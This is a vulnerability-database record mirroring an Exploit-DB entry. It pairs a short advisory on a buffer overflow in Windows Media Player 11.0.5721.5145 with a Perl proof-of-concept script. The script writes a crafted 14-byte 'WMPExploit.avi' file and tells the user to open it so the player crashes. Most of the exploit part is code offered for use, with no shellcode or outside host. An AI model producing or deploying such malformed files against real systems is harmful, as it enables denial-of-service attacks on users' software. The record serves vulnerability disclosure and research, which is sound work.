{"id": "EDB-ID:35553", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Microsoft Windows Media Player 11.0.5721.5145 - '.avi' Buffer Overflow", "description": "", "published": "2011-03-31T00:00:00", "modified": "2011-03-31T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/35553", "reporter": "^Xecuti0N3r", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-08-16T06:22:36", "viewCount": 12, "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "_state": {"dependencies": 1661190352, "score": 1661184847, "epss": 1678803316}, "_internal": {"score_hash": "c50ebfb104ce974057589a6ae1ca4e5d"}, "sourceHref": "https://www.exploit-db.com/download/35553", "sourceData": "source: https://www.securityfocus.com/bid/47112/info\r\n\r\nMicrosoft Windows Media Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.\r\n\r\nAttackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.\r\n\r\nMicrosoft Windows Media Player 11.0.5721.5145 is vulnerable; other versions may also be affected. \r\n\r\n#!/usr/bin/perl\r\n#(+)Exploit Title: Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit\r\n#(+)Software : Windows Media player\r\n#(+)Version : 11.0.5721.5145\r\n#(+)Tested On : WIN-XP SP3\r\n#(+) Date : 31.03.2011\r\n#(+) Hour : 13:37 \r\n#Similar Bug was found by cr4wl3r in MediaPlayer Classic\r\n\r\nsystem(\"color 6\");\r\nsystem(\"title Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit\");\r\nprint \"\r\n_______________________________________________________________________\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\r\n(+)Exploit Title: Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit\r\n \r\n\t\t\r\n(+) Software : Windows Media player\r\n(+) Version : 11.0.5721.5145\t\t\t\t\t\t\t\t\t\r\n(+) Tested On : WIN-XP SP3\t\t\t\t\t\t\t\t\t\t\t\t\r\n(+) Date : 31.03.2011\t\t\t\t\t\t\t\t\t\t\t\t\r\n(+) Hour : 13:37 PM\t\t\t\t\t\t\t\t\t\t\t\t\t\r\n____________________________________________________________________\\n\t\";\r\nsleep 2;\r\nsystem(\"cls\");\r\nsystem(\"color 2\");\r\nprint \"\\nGenerating the exploit file !!!\";\r\nsleep 2;\r\nprint \"\\n\\nWMPExploit.avi file generated!!\";\r\nsleep 2;\r\n$theoverflow = \"\\x4D\\x54\\x68\\x64\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\";\r\n \r\nopen(file, \"> WMPExploit.avi\");\r\nprint (file $theoverflow);\r\nprint \"\\n\\n(+) Done!\\n\r\n(+) Now Just open WMPExplot.avi with Windows Media player and Kaboooommm !! ;) \\n\r\n(+) Most of the times there is a crash\\n whenever you open the folder where the WMPExploit.avi is stored :D \\n\";\r\n\r\nsleep 3;\r\nsystem(\"cls\");\r\nsleep 1;\r\nsystem(\"color C\");\r\nprint \"\\n\\n\\n########################################################################\\n\r\n(+)Exploit Coded by: ^Xecuti0N3r\\n\r\n(+)^Xecuti0N3r: E-mail : xecuti0n3r@yahoo.com \\n\r\n(+)Special Thanks to: MaxCaps, d3M0l!tioN3r & aNnIh!LatioN3r \\n\r\n########################################################################\\n\\n\";\r\nsystem(\"pause\");", "osvdbidlist": [], "exploitType": "dos", "verified": true}